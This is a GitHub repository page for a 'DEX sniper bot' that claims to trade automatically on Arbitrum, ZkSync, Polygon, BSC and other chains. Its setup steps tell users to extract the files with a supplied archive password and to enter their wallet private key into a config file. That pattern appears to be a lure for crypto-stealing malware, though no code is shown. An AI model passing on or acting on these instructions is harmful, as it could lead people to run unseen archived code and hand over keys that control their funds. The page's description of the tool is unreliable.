- Notifications
You must be signed in to change notification settings - Fork24
Updated crypto-sniper bot for L2 solutions (Arbitrum, ZkSync, LayerZero, Linea)
License
deadspyexx/dex-sniper-bot
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
A sniper bot is a type of automated trading bot that is programmed to make trades based on specific market conditions in the cryptocurrency industry. The name "sniper" comes from the bot's ability to make fast and precise trades, entering and exiting positions quickly.
To identify profitable trades, sniper bots use technical analysis and various indicators, such as price changes, trading volume, and market trends. Once the bot detects a favorable trade, it will automatically execute a buy or sell order based on specific parameters, such as target prices or stop-loss limits.
- Arbswap (Arbitrum)
- Uniswap (Optimism)
- BaseSwap (Base)
- zkSwap Finance (ZkSync)
- Pancakeswap (Binance Smart Chain)
- Uniswap (Ethereum)
- Sushiswap (Polygon)
- Quickswap (Polygon)
- Trader Joe (Avalanche)
- Clone repository and extract files with password
whLn1sTWT
. - Edit the address and private_key fields in the config.json file.
- Set up the network and AMMs in the sniping menu. Ensure that there are sufficient funds on the specified address to cover transaction fees.
[WALLET]; This is your BSC wallet's private key.SECRET_KEY=private_wallet_key; A private node is recommended for better uptime. However, you may also use free nodes.WSS_NODE=wss://bsc-ws-node.nariox.org:443[CONTRACTS]; These variables support some pre-defined contracts (BNB, ETH, BUSD).; For other contracts, you'll have to specify the contract address yourself.INPUT=BNBOUTPUT=BUSD[TRANSACTION]GAS_LIMIT=500000GAS_PRICE=5; This variable is the amount of cryptocurrency you wish to use with the input contract.; For example, if you use WBNB as input, you will specify the amount in WBNB's format.AMOUNT_IN=0.0033BUY_SLIPPAGE=10
About
Updated crypto-sniper bot for L2 solutions (Arbitrum, ZkSync, LayerZero, Linea)